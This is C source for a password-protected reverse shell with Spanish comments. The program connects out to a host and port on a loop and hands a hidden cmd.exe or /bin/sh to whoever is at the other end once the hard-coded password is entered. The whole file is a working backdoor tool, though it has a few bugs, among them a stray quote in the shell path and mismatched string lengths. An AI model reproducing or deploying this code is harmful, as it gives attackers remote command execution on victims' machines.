#include <stdio.h>
#include <string.h>
//cabecera y librerias segun SO
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
#else
#include <netdb.h>
#include <sys/socket.h>
#define SOCKET_ERROR -1
#endif
#define PASSWORD "mi_pass\0"
//contraseña
char Buffer[1024]; //variable para enviar/recibir datos
int Recv; //para saber cuantos datos hemos transmitido
int sock;
int ReverseShell(char *Destino, short Puerto,char *pwd);
/*funcion principal*/
int main()
{
for(;;)
{
if(send(sock,"",0,0)<=0)
{
#ifdef WIN32
WSACleanup();
#else
close(sock);
#endif
ReverseShell("localhost",4664,PASSWORD);
}
#ifdef WIN32
Sleep(100);
#else
sleep(100);
#endif
}
return 0;
}
int ReverseShell(char *Destino, short Puerto, char *pwd)
{
int Loggea();
struct hostent *Master;
struct sockaddr_in Winsock_In;
//si estamos en windows cargamos la libreria
#ifdef WIN32
STARTUPINFO start_proc;
PROCESS_INFORMATION info_proc;
OSVERSIONINFO SOinfo;
WSADATA wsaData;
char *shell;
//iniciamos la libreria para crear socket
WSAStartup(MAKEWORD(2,2),/*version del socket*/ &wsaData /*estrutura que recibe las propiedades del socket*/);
if((sock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL))==INVALID_SOCKET)
return 0;
#else
if((sock=socket(AF_INET,SOCK_STREAM,0))==SOCKET_ERROR)
return 0;
#endif
Master=gethostbyname(Destino);
Winsock_In.sin_family=AF_INET;
//IPv4
Winsock_In.sin_port=htons(Puerto);
//puerto al que conectar
Winsock_In.sin_addr= *((struct in_addr *)
Master->h_addr); //host al que conectar
#ifdef WIN32
if(WSAConnect(sock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
return 0;
#else
if(connect(sock,(struct sock_addr *)&Winsock_In,sizeof(struct sockaddr))==SOCKET_ERROR)
return 0;
#endif
if(Loggea()==0)
return 0;
#ifdef WIN32
//rellenamos la estructura
memset(&start_proc,0,sizeof(start_proc));//limpiamos
start_proc.cb=sizeof(start_proc);
start_proc.dwFlags=STARTF_USESTDHANDLES;
start_proc.wShowWindow=SW_HIDE;
start_proc.hStdInput=(HANDLE)sock;
start_proc.hStdOutput=(HANDLE)sock;
start_proc.hStdError=(HANDLE)sock;
GetVersionEx(&SOinfo);
if(SOinfo.dwPlatformId==VER_PLATFORM_WIN32_WINDOWS)
{
shell="command.com\0";
}
else
{
shell="cmd.exe\0";
}
//lanzamos la shell
if(CreateProcess(NULL,shell,NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc)==0)
{
return 1;
}
else
{
WSACleanup();
return 0;
}
#else
if(fork()!=0)
{
close(sock);
return 0;
}
//duplicamos los handles del socket
dup2(sock,0);
dup2(sock,1);
dup2(sock,2);
if(!execl("/bin/sh'","sh",NULL))
{
close(sock);
return 0;
}
#endif
return 1;
}
//devulve 0 (incorrecto) / 1 (correcto)
int Loggea()
{
if(PASSWORD!=NULL)
{
do
{
//limpiamos el buffer
memset(Buffer,0,sizeof(char*));
//pedimos la contraseña
send(sock,"\n[#] Introduce la password: ",strlen("\n[#]Introduce la password: "),0);
//recibimos los datos
Recv=recv(sock,Buffer,1024,0);
//comprobamos si ha cerrado la conexion
if(Recv<=0)
return 0;
Buffer[Recv-1]='\0';
}
while(strcmp(Buffer,PASSWORD)!=0);
send(sock,"[#]Aceptada!\n\n",strlen("[#]Aceptada!\n\n)"),0);
}
return 1;
}